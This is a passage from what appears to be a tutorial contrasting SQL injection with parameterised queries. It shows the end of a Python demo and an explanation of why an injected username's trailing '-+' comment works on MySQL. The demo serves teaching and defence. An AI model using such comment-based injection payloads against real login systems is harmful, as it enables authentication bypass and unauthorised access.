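    print("parameterised query, injected username:", login_fixed(db, INJECTED_USERNAME, "aaaa"))
    print("parameterised query, real credentials:", login_fixed(db, "admin", "s3cret"))
```

The trailing "-+" in the payload matters on MySQL, which requires whitespace after "--" for a comment; SQLite does not, but the parameterised version rejects the input on either engine because the whole string is compared as a username value.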